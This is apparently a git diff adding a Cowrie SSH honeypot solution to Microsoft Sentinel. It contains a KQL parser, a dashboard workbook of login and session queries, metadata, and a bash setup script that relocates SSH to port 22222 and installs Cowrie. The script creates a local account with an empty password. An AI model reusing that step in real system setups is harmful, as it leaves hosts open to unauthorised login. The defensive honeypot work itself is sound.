"packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId5')]", + "contentKind": "Playbook", + "displayName": "QualysVM-LaunchVMScan-GenerateReport", + "contentProductId": "[variables('_playbookcontentProductId5')]", + "id": "[variables('_playbookcontentProductId5')]", + "version": "[variables('playbookVersion5')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentPackages", + "apiVersion": "2023-04-01-preview", + "location": "[parameters('workspace-location')]", + "properties": { + "version": "3.0.0", + "kind": "Solution", + "contentSchemaVersion": "3.0.0", + "displayName": "QualysVM", + "publisherDisplayName": "Microsoft Sentinel, Microsoft Corporation", + "descriptionHtml": "

Note: Please refer to the following before installing the solution:

\n

• Review the solution Release Notes

\n

• There may be known issues pertaining to this Solution, please refer to them before installing.

\n

The Qualys Vulnerability Management solution for Microsoft Sentinel enables you to ingest host vulnerability detection data into Microsoft Sentinel.

\n

Underlying Microsoft Technologies used:

\n

This solution takes a dependency on the following technologies, and some of these dependencies either may be in Preview state or might result in additional ingestion or operational costs:

\n
    \n

  1. Azure Monitor HTTP Data Collector API

    \n
    2. \n

  2. Azure Functions

    \n
    3. \n
\n

Data Connectors: 1, Workbooks: 1, Analytic Rules: 2, Custom Azure Logic Apps Connectors: 1, Playbooks: 4

\n

Learn more about Microsoft Sentinel | Learn more about Solutions

\n", + "contentKind": "Solution", + "contentProductId": "[variables('_solutioncontentProductId')]", + "id": "[variables('_solutioncontentProductId')]", + "icon": "", + "contentId": "[variables('_solutionId')]", + "parentId": "[variables('_solutionId')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "operator": "AND", + "criteria": [ + { + "kind": "DataConnector", + "contentId": "[variables('_dataConnectorContentId1')]", + "version": "[variables('dataConnectorVersion1')]" + }, + { + "kind": "Workbook", + "contentId": "[variables('_workbookContentId1')]", + "version": "[variables('workbookVersion1')]" + }, + { + "kind": "AnalyticsRule", + "contentId": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "version": "[variables('analyticRuleObject1').analyticRuleVersion1]" + }, + { + "kind": "AnalyticsRule", + "contentId": "[variables('analyticRuleObject2')._analyticRulecontentId2]", + "version": "[variables('analyticRuleObject2').analyticRuleVersion2]" + }, + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-GetAssetDetails')]", + "version": "[variables('playbookVersion2')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-GetAssets-ByCVEID')]", + "version": "[variables('playbookVersion3')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-GetAssets-ByOpenPort')]", + "version": "[variables('playbookVersion4')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-LaunchVMScan-GenerateReport')]", + "version": "[variables('playbookVersion5')]" + } + ] + }, + "firstPublishDate": "2020-12-14", + "lastPublishDate": "2022-09-30", + "providers": [ + "Qualys" + ], + "categories": { + "domains": [ + "Security - Vulnerability Management", + "Security - Automation (SOAR)" + ] + } + }, + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/', variables('_solutionId'))]" + } + ], + "outputs": {} +} diff --git a/Solutions/Sensor SSH Cowrie/Package/testParameters.json b/Solutions/Sensor SSH Cowrie/Package/testParameters.json new file mode 100644 index 00000000000..aa285f95585 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/testParameters.json @@ -0,0 +1,32 @@ +{ + "location": { + "type": "string", + "minLength": 1, + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Not used, but needed to pass arm-ttk test `Location-Should-Not-Be-Hardcoded`. We instead use the `workspace-location` which is derived from the LA workspace" + } + }, + "workspace-location": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "[concat('Region to deploy solution resources -- separate from location selection',parameters('location'))]" + } + }, + "workspace": { + "defaultValue": "", + "type": "string", + "metadata": { + "description": "Workspace name for Log Analytics where Microsoft Sentinel is setup" + } + }, + "workbook1-name": { + "type": "string", + "defaultValue": "Cowrie", + "minLength": 1, + "metadata": { + "description": "Name for the workbook" + } + } +} diff --git a/Solutions/Sensor SSH Cowrie/Parsers/CowrieEvents.yaml b/Solutions/Sensor SSH Cowrie/Parsers/CowrieEvents.yaml new file mode 100644 index 00000000000..f154d193f1a --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Parsers/CowrieEvents.yaml @@ -0,0 +1,12 @@ +id: 2a6da7ac-e5fd-4eba-9a49-e6f069c838c8 +Function: + Title: Parser for Cowrie + Version: '1.0.0' + LastUpdated: '2024-09-19' +Category: Microsoft Sentinel Parser +FunctionName: Cowrie +FunctionAlias: Cowrie +FunctionQuery: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid), URL = tostring(parse_json(RawData).url), Outfile = tostring(parse_json(RawData).outfile), Sha256Value = tostring(parse_json(RawData).shasum), Sensor = tostring(parse_json(RawData).sensor), Message = tostring(parse_json(RawData).message), SourceIP = tostring(parse_json(RawData).src_ip), SessionID = tostring(parse_json(RawData).session) + | project EventID, URL, Outfile, Sha256Value, Sensor, Message, SourceIP, SessionID \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/ReleaseNotes.md b/Solutions/Sensor SSH Cowrie/ReleaseNotes.md new file mode 100644 index 00000000000..dd873bf3cc3 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/ReleaseNotes.md @@ -0,0 +1,3 @@ +| **Version** | **Date Modified (DD-MM-YYYY)** | **Change History** | +|-------------|--------------------------------|---------------------------------------------------------------| +| 1.0.0 | 19-09-2024 | Added intial Sensor SSH Cowrie Solution from Hackathon 2024 | \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/SolutionMetadata.json b/Solutions/Sensor SSH Cowrie/SolutionMetadata.json new file mode 100644 index 00000000000..c84f870c1a7 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/SolutionMetadata.json @@ -0,0 +1,16 @@ +{ + "publisherId": "azuresentinel", + "offerId": "azure-sentinel-sensor-ssh-cowrie", + "firstPublishDate": "2024-09-19", + "lastPublishDate": "2024-09-19", + "providers": ["Microsoft"], + "categories": { + "domains": ["Security - Sensor"] + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } +} \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Workbooks/Cowrie.json b/Solutions/Sensor SSH Cowrie/Workbooks/Cowrie.json new file mode 100644 index 00000000000..4ae3b554300 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Workbooks/Cowrie.json @@ -0,0 +1,161 @@ +{ + "version": "Notebook/1.0", + "items": [ + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "union withsource=_TableName *\n| summarize Count=count() by _TableName\n| render barchart", + "size": 1, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces" + }, + "name": "query - 2" + }, + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "newCowrie_CL\r\n| extend SourceIP = tostring(parse_json(RawData).src_ip)\r\n| summarize TotalSessions = count() by SourceIP\r\n| order by TotalSessions desc\r\n", + "size": 0, + "title": "Total Sessions by Source IP", + "timeContext": { + "durationMs": 86400000 + }, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces", + "visualization": "piechart", + "gridSettings": { + "sortBy": [ + { + "itemKey": "SourceIP", + "sortOrder": 1 + } + ] + }, + "sortBy": [ + { + "itemKey": "SourceIP", + "sortOrder": 1 + } + ] + }, + "name": "query - 2" + }, + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "newCowrie_CL\r\n| extend EventID = tostring(parse_json(RawData).eventid)\r\n| summarize EventCount = count() by EventID\r\n| order by EventCount desc\r\n", + "size": 0, + "title": "Event Type Distribution", + "timeContext": { + "durationMs": 86400000 + }, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces", + "visualization": "areachart" + }, + "name": "query - 3" + }, + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "newCowrie_CL\r\n| extend Timestamp = todatetime(parse_json(RawData).timestamp)\r\n| summarize TotalSessions = count() by bin(Timestamp, 1h)\r\n| order by Timestamp\r\n", + "size": 0, + "title": "Session Trends Over Time", + "timeContext": { + "durationMs": 86400000 + }, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces", + "visualization": "table" + }, + "name": "query - 4" + }, + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "newCowrie_CL\r\n| extend EventID = tostring(parse_json(RawData).eventid), Timestamp = todatetime(parse_json(RawData).timestamp)\r\n| where EventID == \"cowrie.login.success\"\r\n| summarize SuccessfulLogins = count() by bin(Timestamp, 1h)\r\n| order by Timestamp\r\n", + "size": 0, + "title": "Successful Login Attempts Over Time", + "timeContext": { + "durationMs": 86400000 + }, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces", + "visualization": "barchart" + }, + "name": "query - 5" + }, + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "newCowrie_CL\r\n| extend EventID = tostring(parse_json(RawData).eventid), SourceIP = tostring(parse_json(RawData).src_ip)\r\n| where EventID == \"cowrie.login.failed\"\r\n| summarize FailedLogins = count() by SourceIP\r\n| order by FailedLogins desc\r\n", + "size": 0, + "title": "Failed Login Attempts", + "timeContext": { + "durationMs": 86400000 + }, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces" + }, + "name": "query - 6" + }, + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "newCowrie_CL\r\n| extend Duration = todouble(parse_json(RawData).duration), SourceIP = tostring(parse_json(RawData).src_ip)\r\n| summarize AvgDuration = avg(Duration) by SourceIP\r\n| order by AvgDuration desc\r\n", + "size": 0, + "title": "Session Duration Analysis", + "timeContext": { + "durationMs": 86400000 + }, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces", + "visualization": "categoricalbar" + }, + "name": "query - 7" + }, + { + "type": 3, + "content": { + "version": "KqlItem/1.0", + "query": "let GeoLocationData = datatable(SourceIP: string, Country: string, Latitude: real, Longitude: real)\r\n[\r\n \"115.99.242.123\", \"India\", 12.97623, 77.60329,\r\n \"162.142.125.41\", \"USA\", 42.25986, -83.7199\r\n];\r\nnewCowrie_CL\r\n| extend SourceIP = tostring(parse_json(RawData).src_ip)\r\n| join kind=inner (GeoLocationData) on SourceIP\r\n| summarize LoginAttempts = count() by Country, Latitude, Longitude\r\n| order by LoginAttempts desc\r\n", + "size": 0, + "title": "Login Attempts by Country", + "timeContext": { + "durationMs": 86400000 + }, + "queryType": 0, + "resourceType": "microsoft.operationalinsights/workspaces", + "visualization": "map", + "mapSettings": { + "locInfo": "LatLong", + "locInfoColumn": "Country", + "latitude": "Latitude", + "longitude": "Longitude", + "sizeSettings": "LoginAttempts", + "sizeAggregation": "Sum", + "labelSettings": "Country", + "legendMetric": "LoginAttempts", + "legendAggregation": "Sum", + "itemColorSettings": { + "nodeColorField": "LoginAttempts", + "colorAggregation": "Sum", + "type": "heatmap", + "heatmapPalette": "greenRed" + } + } + }, + "name": "query - 7" + } + ], + "fallbackResourceIds": [], + "fromTemplateId": "sentinel-Cowrie", + "$schema": "https://github.com/Microsoft/Application-Insights-Workbooks/blob/master/schema/workbook.json" +} \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/data/Solution_Cowrie.json b/Solutions/Sensor SSH Cowrie/data/Solution_Cowrie.json new file mode 100644 index 00000000000..cdbe0b218c5 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/data/Solution_Cowrie.json @@ -0,0 +1,27 @@ +{ + "Name": "Sensor SSH Cowrie", + "Author": "Microsoft - support@microsoft.com", + "Logo": "", + "Description": "The Sensor SSH Cowrie solution for Microsoft Sentinel enables you to deploy a Azure VM for as a HoneyPot for private internal detection tripwire capabilitties or deploy publicly on the internet for threat intellegence gathering.\r\n\r\n **Underlying Technologies used:** \r\n\r\n This solution takes a dependency on the following technologies, and some of these dependencies might result in additional ingestion or operational costs:\r\n\n a. [Cowrie](https://cowrie.readthedocs.io/en/latest/)\r\n\n", + "Data Connectors": [ + "Data Connectors/Microsoft-SSHCowrieSensor.json" + ], + "Workbooks": [ + "Workbooks/Cowrie.json" + ], + "Analytic Rules": [ + "Analytic Rules/DetectSuspiciousFileDownloads.yaml", + "Analytic Rules/MonitorUnusualFileExecution.yaml", + "Analytic Rules/DetectFileUploadsandDownloads.yaml", + "Analytic Rules/DetectConnectionEvents.yaml", + "Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml" + ], + "Parsers": [ + "Parsers/CowrieEvents.yaml" + ], + "Metadata": "SolutionMetadata.json", + "BasePath": "C:\\GitHub\\Azure-Sentinel\\Solutions\\Sensor SSH Cowrie", + "Version": "3.0.0", + "TemplateSpec": true, + "Is1PConnector": false +} \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/scripts/script.sh b/Solutions/Sensor SSH Cowrie/scripts/script.sh new file mode 100644 index 00000000000..46ef0f309c5 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/scripts/script.sh @@ -0,0 +1,67 @@ +#!/bin/bash + +# Update and install dependencies +sudo apt-get update +sudo apt-get install -y git python3 python3-venv python3-dev libssl-dev libffi-dev build-essential + +#Backup the current SSH configuration file +sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak +#Change the SSH port to 22222 +sudo sed -i 's/^#Port 22/Port 22222/' /etc/ssh/sshd_config +#Restart the SSH service to apply changes +sudo systemctl restart ssh.service +echo "SSH port changed to 22222 and SSH service restarted." + +# Create a cowrie user without a password +sudo useradd -m -s /bin/bash -c "Cowrie" -p "" cowrie + +# Switch to the cowrie user and set up the environment +sudo -u cowrie bash << EOF +cd /home/cowrie +git clone https://github.com/cowrie/cowrie.git +cd cowrie +python3 -m venv cowrie-env +source cowrie-env/bin/activate +pip install --upgrade pip +pip install -r requirements.txt +cp etc/cowrie.cfg.dist etc/cowrie.cfg +cp etc/userdb.example etc/userdb.txt +bin/cowrie start +EOF + +# Create the systemd service file for cowrie +#cat <